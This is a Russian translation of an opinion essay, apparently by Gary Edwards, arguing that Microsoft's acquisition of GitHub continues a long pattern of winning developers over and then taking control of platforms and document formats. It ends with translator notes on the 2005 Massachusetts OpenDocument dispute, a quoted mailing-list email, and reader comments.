Подход бархатной перчатки срабатывал у Microsoft каждый раз. Уже более 30 лет Microsoft-Люси утягивает мяч от разработчика Чарли Брауна. И контроль над GitHub мне абсолютно ясен. Но использовать Ната [Nat Friedman, GH CEO] в роли приманки по-моему чересчур.[1]

За Microsoft стоит удачная история овладевания и контроля над компьютерной платформой с целью контроля над сферой разработки ПО. Та поддержка, которую они оказывали разработчикам на заре Windows, была легендарна. И реальна. Дело в том, что пока люди скучковывались в сообщество разработчиков Windows, изобретая попутно совсем новые категории программ, они и понятия не имели, что все их перспективы и с ними связанные мечты на самом деле принадлежали Microsoft. Конечно, поддержка и маркетинговая помощь от Microsoft были потрясающими. Но оглядываясь назад, мы были идиотами. Точнее, я идиот 0055.
Люси оттягивает мяч перед Чарли, тот промахивается и со всей скорости падает на землю

Стоило лишь определенной категории программ вырасти до прибыльности, а разработчикам и инвесторам начать пускать слюнки, что их день вот, наконец, настал, как вмешивалась Microsoft и отбирала себе целую категорию этого рынка. Иногда это происходило за счет одного только объявления, что Microsoft планировала какую-то программу. Как это случилось с категорией менеджера связей и объявлением Outlook. Инвестиции прекратились. Продажи встали. Должны были пройти три года, прежде чем первая сносная версия Outlook увидела свет. А независимым разработчикам досталось. Те перспективы, о которых они мечтали, всегда были за Microsoft и всегда ей принадлежали.

Вот она сила контроля над платформой.

Платформа контролирует сферу ПО. А программы контролируют цифровую информацию, которую они собирают и производят. Новым разработчикам ПО нужен доступ к тоннам этой программозависимой информации. Но эта информации всё больше и больше принадлежит вычислительным платформам Microsoft Azure и облаку Office 365. Хочешь доступа? Регистрируйся на GitHub. Поцелуй бархатную перчатку. И потом жди, пока Люси не заберет мяч ото всех твоих перспектив, которые ты держал за свои.

Припоминаю я свою первую конференцию JavaONE. Первая продажа акций Netscape в августе 1995-го взбудоражила мир до лихорадки из-за сети Интернет. Java была представлена как способ разработки программ для сети Интернет. Удивительно как много было разработчиков Windows на первой и второй конференциях JavaONE. Выглядело это скорее как конференция по Windows-OS/2 минувших дней. Казалось, что я там всех знаю. Чувствовал себя как дома. На самом деле, я смекал из-за чего мы были там. Интернет был платформой используемой всеми, не принадлежащей никому. Он также стал приютом для сообществ открытого ПО (OSS).

Напряженность между OSS разработчиками и Sun заметно ощущалась. Мы виндузятники смотрели на это с изумлением. Сообщества открытого ПО боялись, что Java была троянским конём, придуманным Sun, дабы завладеть сферой ПО для Интернет. Это как раз то, что случилось с разработчиками Windows и объясняло, с чего мы собрались на JavaONE. Целыми толпами.

В первые дни общественного интереса, Интернет казался прелестью универсальной платформой, к которой был доступ у всех. Это первая платформа из увиденных мною, где коммуникации, вычисления и сотрудничество могли слиться воедино.

Все мы знаем те последующие годы, когда бизнес и OSS бились за Интернет. Бархатная перчатка, ту что носит Нат, ни что иное как ещё один вызов, и как всегда: опять всё на кону. Первое Правило Кремниевой Долины: Владелец платформы заправляет её перспективами.

Большое отличие в сей раз что в ранние времена Windows (справедливо и для Интернет тоже) было временем большого перехода от аналогового к цифровому и созиданием информации. Этот переход также означал, что данные переходили под контроль программ их собирающих и использующих.

Те Интернет-войны, и та мощь, сообща действующих сторонников открытого ПО, установили, что низлежащая программная платформа будет открыта и доступна всем. Но точно также оказалось правдой, что впредь если не все, то большая часть данных в мире будет программозависимой. Означая невседоступность по отношению к новым разработчикам. За исключением, когда это касалось открытого ПО.

В 1995-ом я работал с системой видеоконференций Intel ProShare Video Conferencing System, разрабатывая программы для интеграции средств коммуникаций с вычислительной информацией и совместной работой. В ретроспективе это кажется безупречным проектом, на который способен был лишь Интернет. Но тогда не было ни Netscape, ни Java, ни единого устоявшегося взгляда на то, чем Интернет позже станет. Торговля акциями Netscape началась в августе 95-го, скачок Java пришёлся на следующий год. В тот же год случился феномен под названием Windows. К тому времени, Люси уже забрала мяч и сообщество разработчиков под Windows прекрасно понимали, что Microsoft сама заведует всеми перспективами платформы Windows. Теми перспективами, что они могли отобрать в любой момент.

У Intel было много толковых ребят. И я подчеркиваю: очень умных. Та идея, связать коммуникации с вычислительной мощностью, всё это в обертке платформы для совместной работы она была у всех на уму. Вывели и маркетинговую формулу, которая всё это объясняла. Эта формула и объясняет почему бархатная перчатка и в какую сторону устремилась Microsoft.

Она была названа Уравнение Продуктивности Красиво. И звучит примерно так: продуктивность равна интеграции вычислений с коммуникациями, вычислительной информацией (данные, документы, сообщения) и сотрудническим обменом.

Правда красиво. Но есть и глубина, если всмотреться в вычислительную информацию. Ты замечаешь, что большинство данных в мире находится под контролем программ. Завладея сферой ПО ты завладеешь и всей информацией, которую контролируют эти программы. Не спускай глаз с мяча, Чарли Браун.

Несомненно, мы живем в мире животрепечущем о всё более высокой эффективности и инновациях во благо продуктивности. Доступ к вычислительной информации жизненно необходим. Но это и мир где МНОГИМ программам нужно работать с теми же самыми данными. Аспект этого высказывания нужно многим программам и есть причина, по которой мы вновь видим бархатную перчатку.

Давайте разъясню. Данные из уравнения не программозависимы. Данные можно перемещать (спасибо, SQL). Многие программы имеют к ним доступ. Если бы программы для данных имели контроль над их информацией, то Oracle бы рулила облачными вычислениями.

Часть вторая


При всём этом с документами дело обстоит иначе. Хуже того, с каждым днем мы наблюдаем как программный контроль над документами превращается в контроль надо всем уравнением продуктивности. Подчини себе документную часть этого уравнения и ты завладеешь всевозможными перпективами в мире, где многим программам необходим доступ к информации из документов. Почему так всё сложилось? Потому что другие части уравнения открыты и далеко не столь контролируемы и программозависимы как документы.

Конечно, Oracle бы с радостью воспользовались их программозависимыми данными, чтобы стать империей облачных вычислений. Но они и близко не стояли по сравнению с Microsoft и их железной хваткой над документами, которые для Office родные.

Всё это так же верно и для коммуникаций и способов коллективной работы. Ни у кого нет эксклюзивной и такой важной позиции контроля в данном уравнении. Ни у Slack. Ни у любого коммуникационного гиганта. Это значит, что запрет Microsoft на информацию из документов может быть использован, чтобы повлиять на другие аспекты уравнения.

Стоит обратить внимание на взаимосвязь разных компонент уравнения. У них есть шаблон по взаимной интеграции именно потому, как они появились. Коммуникации (всякого рода сообщения) и вычислительный контент (данные и документы) развивались независимо друг от друга. Ключевая часть уравнения это интеграция этих двух, что делает возможным и третью компоненту: совместную работу.

Совместная работа это сумма интегрированных коммуникаций и вычислительной информации. Есть и явная связь между данными и документами. Данные собираются, затем анализируются или каким-то другим образом встраиваются в документы. Документы представляют из себя более высокую форму накопленных знаний, т.к. они выражают то, как мы с вами думаем, обсуждаем, и анализируем данные. Документы это вид линейной коммуникации. И если их собрать воедино с динамическими, нелинейными видами коммуникации, и с платформой Интернет, то документы создают нечто благовенное для совместной работы, где не только люди могут друг с другом общаться, но и место для умных программ с неимоверной вычислительной мощью за их спиной.

Смысл в том, что большая часть бизнес-процессов и информации для них зависят от программ от Microsoft. Ни один бизнес, организация, или корпорация никуда ни в какое облако не пойдет без их данных, документов, и методов работы.

Вот из-за чего у Google такие проблемы с привлечением бизнеса. Они не могут посягнуть на этот великий переход монополии Microsoft пока не придумают как быть с родными для Microsoft документами. А придумать должны не испортив при этом ни документы, ни процессы, которые на них завязаны. Никто не станет переписывать и заменять эти документы, когда можно просто пойти в облако Microsoft и прибавить ценности тому, что и так уже работает и зарабатывает деньги.

В общем целом, дело тут не в Искуственном Интеллекте или каком-то новом виде программ. Тут всё крутится вокруг драгоценных данных, документов и процессов. А чем больше информации доступно ИИ движкам, и с чем большей базой они могут прямо взаимодействовать, тем лучше и полезней эти движки.

ИМХО, весь тот прогресс в ИИ, который проделали Google, SalesForce и IBM, каким бы потрясающим он не был, даже близко не стоял с Microsoft. В конце концов вся красота переписки в Slack падет, как только предстанет перед, еле того достойной, версией MS Teams, но которая будет снабжена документами.

Бегемоты Кремниевой Долины могут хоть запридумываться новыми видами программ и их функционалом. Но пока они не дотянутся до миллиардов документов, которые завязаны на программы Microsoft, до тех пор будущее облачных вычислений будет принадлежать Редмонду. И даже сказочное преимущество первопроходца не сможет пошатнуть ту силу, которую представляет из себя контроль над вычислительными данными.

Стратегия первопроходца это сказка, как только дело касается платформ с вычислительными данными. Преимущество принадлежит тем, кто программно контроллирует информацию, а также их новым программам, на которые этот контроль распространяется.

Смотрите сами: феномен облачных вычислений, как программная платформа, начал набирать обороты с выходом Google gMail и SalesForce.com. Подумать только, какая у них была фора, сколько времени! И когда iPhone вышел в свет в 2007г., началась гонка в облака. AWS появляется из ниоткуда и предоставляет отдельным разработчикам огромную вычислительную мощь в облаке.

В отчете за 2014г. Gartner Magic Quadrant записали Apple как облачного провайдера 1. Номером два был DropBox, за ним следовали Google, SalesForce, и Box. Баллмер [Steve Ballmer] уходит в феврале 2014-го, после ужасного многомиллиардного приобретения: коммуникационного гиганта Nokia. Тут бархатная перчатка перенимает и Office 365 становится доступным внутри империи iPhone. С Apple всё выглядит хорошо. А Windows не очень. DropBox, SalesForce и Box помчались за лицензией Office 365. Они жаждали сыграть с Люси в её рулетку [русскую рулетку]. И бархатная перчатка приняла их с распростертыми объятиями.

Далее проиcходило невероятное. С выпуском Office 365, вся монополия Microsoft начинает одно из величайших преобразований в компьютерной истории; переход их информации и программ с платформы Windows в Azure облако Office 365. Первым телодвижением бархатная перчатка устанавливает за собой владение над программозависимыми документами, чтобы перевести все столпы монополии с её системами в бизнесах и корпорациях.

2018-й год Magic Quadrant почти полностью закрепляет за двумя компаниями: Amazon и Microsoft. Четыре коротких года и развязка этого действа уже в поле зрения.[2] Google бьется с их классными и многообещающими ИИ, автоматизацией сообщений и бизнеса всё дальше об стену. Но дело не сдвигается с мертвой точки. Они остаются висеть на ниточке облачных вычислений. Остальные же лидеры облачных вычислений без конца изобретают вдохновляющие и фантастические программные возможности и перспективы, между тем Microsoft так же держит железный кулак над теми документами и информацией, которая нужна их конкурентам.

Часть третья


Что бы вы ни думали о Microsoft, согласитесь, это преобразование проделывается по-мастерски красиво. Удивительно, ведь ни один из конкурентов не решается разговаривать на тему происходящего. Ну, понятно, ни что не может обвалить цену собственных акций, как признание всему миру, что твоя судьба лежит в руках хладнокровного монополиста с железной хваткой, на котором уж так прекрасно сидят эти бархатные перчатки.

В 2018-м рост облака Microsoft оценивали в 18 млрд. долларов в год. Год спустя, оценка роста подписок в год исходила от ошеломляющих 33 млрд. долларов. Всё это и дальше экспоненциально устремляется ввысь.

Понимание сей новости[0] заключается в том, что разработчики c GitHub получат доступ к массивам вычислительной информации из облака Microsoft. А без этого никак, согласен. Но пока не перепрыгул, запомни: Люси тебе не друг. Бархатная перчатка отлично сидит на железной руке. И все перспективы, о которых мечтаешь, в которые вливаешься всеми силами и душою, твоими навыками и деньгами? Что ж, они принадлежат Microsoft. Опять.

Тебя отблагодарят.

~ge~

Конец

Сноски
[0] Microsoft? Oh it's just another partnership, insists GitHub CEO The Register, 24.05.2019

[1] В оригинале: But using Nat as bitch bait is a bit much. Нат, как парень, кто до непристойности легко, втирается в доверие девушкам. В данном случае эту черту эксплуатирует. наверх

[2] and the end game is in sight. End game это устоявшийся сленговое выражение, которое не столько буквальное финал и заключение, а как последняя фаза действия, цель, со стороны возможно непонятной, тактической игры. Перевод названия фильма Avengers: Endgame не воспроизводит всю эту глубину термина. наверх

Исторический контекст и примечание

Об авторе и истории:


Эта статья была оставлена год назад в виде комментария под новостной статьей о том, что несмотря на приобретение GitHub, Microsoft для этой компании останется как и прежде партнером.[0] Но грех бы было пройти мимо этого комментария, для меня он стал тем hidden gem, который случайно находишь в глубинах Интернета.

Интересно не оставляет обычный человек из ниоткуда вот такое вот эссе. Углубившись в поиски перед переводом я выяснил, что Гэри некоторое время состоял в Техническом Коммитете OpenDocument OASIS (как минимум 2002-2005гг.), где ковались в т.ч. форматы используемые OpenOffice в противовес всему Microsoft Office, и был волонтёром OpenOffice.org, далее, как понимаю, у него продолжилась карьера в ИТ-маркетинге (данные из презентации, стр. 3).
В 2005 году разыгралась драма нешуточных масштабов, когда американский штат Массачусеттс выдвинули идею стандартизировать OpenDocument для своего бюрократического аппарата. Разумеется, Microsoft боролась против этой затеи, что, видно, оставило след на памяти всех, кто был за открытый стандарт документов.
Officials in the state have proposed a new policy that mandates that every state technology system use only applications designed around OpenDocument file formats
Fox News, September 2005

В следствие этого конфликта, Microsoft устроили кампанию против этого стандарта/OOo, с тезисом, что формат может быть проприетарным из-за наличия каких-то лицензий или патентов от Sun, сообщение из рассылки (26.09.2005):
ODF Reciprocal License Allegation
Hi Eduardo,

Thanks for responding. Your explanation makes sense, but the shills and lackeys are off and running wild with this new discovery
that Sun has secret patents on ODF. Yes, they went full throttle, zero to sixty in under four seconds.

By next week this latest conspiracy theory will likely go the way of other myths that got some noise, and then into a vast echo
chamber that otherwise intelligent people reference in shamelessly self serving ways to justify the next conspiracy theory. I can
hear the deafening refrain now, There were so many reports that Sun had patents on ODF and that it's not really open, that you have
to stop and think.

I wrote a response to Brian Jones, and sent it to PJ for review. But the truth is, today is the first time i ever had to think
through the licensing issues. The interesting thing is that it's easy to circle false arguments, and set them spinning, even without
having a clue as to what i'm talking about :) At the end of the day they will become the fateful victims of their own wishful and
self serving exuberance. Such is life when you have no sense of integrity, trust and truth. And don't understand that when push
comes to shove, trust and truth are the only things that matter. Push came to shove in Massachusetts, and everyone got to see, up
close and personal, who they really are. Not a pretty sight. +1 Open Standards. +1 Open Source. Transparency rules.

Your arguments though have the truth of being there. Would you mind if PJ published your comments? I know that's asking a lot,
especially since there's far more at stake than needing to respond to the lies and deceits of the MS Office 12 gang. But your
response is clean, clear, and to the point. Groklaw does have one loud and booming voice. And PJ is the kind of do gooder who
doesn't like FUD. She usually does an excellent job of exposing and slamming away lies, deceits and distortions.

There is the distinct probability that things will get worse. I for one am quite surprised by the heavy handed, uncompromising take
no prisoners ferocity Microsoft has shown regarding the Massachusetts decision. ODF though is a silver bullet, and the shot Eric
Kriss and Peter Quinn took at all proprietary, platform and application bound file formats found it's mark. Finally.

The day before the final decision was made, i had a chance to speak at length with Peter Quinn. They were hoping against hope that
Microsoft would respect their decision and make the necessary accommodations to provide OpenDocument files. Sadly it was not to be,
but for sure Microsoft was given every consideration. Deserved or not.

Peter did ask if i would participate in his panel discussion session at the upcoming NACIO conference in San Diego. They expect
excellent attendance from every state. He's trying to get someone from Microsoft, but so far they are refusing to participate. So i
asked him if it would be okay if showed up with a few hundred OpenOffice.org CD's to pass out. He told me i would need more than that
:) Apparently the line behind Massachusetts is both long and ready.

I also asked if he and Eric would kindly autograph my copy of the OASIS OpenDocument v 1.0 specification. He said of course, but then
asked if i could get him a copy autographed by all the engineers and TC members who worked on OpenDocument. That would be a very nice
thing to do Eduardo, but could Sun help me put something like that together?

Thanks for setting things straight,

~ge~


С ссылкой на вот это очень длинное чтиво: Comments on Microsofts Letter to Massachusetts
by David A. Wheeler, October 29, 2005


Ещё есть интервью с GE, приуроченное к выходу OOo 2.0 (ноябрь, 2005): Gary Edwards: OpenOffice.org 2.0 leaping over legacy lockdown with clean XML

На письмо на эл. почту 2002 года (на yahoo) он не ответил :) Другие домены истекли, LinkedIn не пробовал, хотя он там наверняка есть.
Подробнее..

Категории

Последние комментарии

  • Имя: Макс
    24.08.2022 | 11:28
    Я разраб в IT компании, работаю на арбитражную команду. Мы работаем с приламы и сайтами, при работе замечаются постоянные баны и лаги. Пацаны посоветовали сервис по анализу исходного кода,https://app Подробнее..
  • Имя: 9055410337
    20.08.2022 | 17:41
    поможем пишите в телеграм Подробнее..
  • Имя: sabbat
    17.08.2022 | 20:42
    Охренеть.. это просто шикарная статья, феноменально круто. Большое спасибо за разбор! Надеюсь как-нибудь с тобой связаться для обсуждений чего-либо) Подробнее..
  • Имя: Мария
    09.08.2022 | 14:44
    Добрый день. Если обладаете такой информацией, то подскажите, пожалуйста, где можно найти много-много материала по Yggdrasil и его уязвимостях для написания диплома? Благодарю. Подробнее..
© 2006-2024, personeltest.ru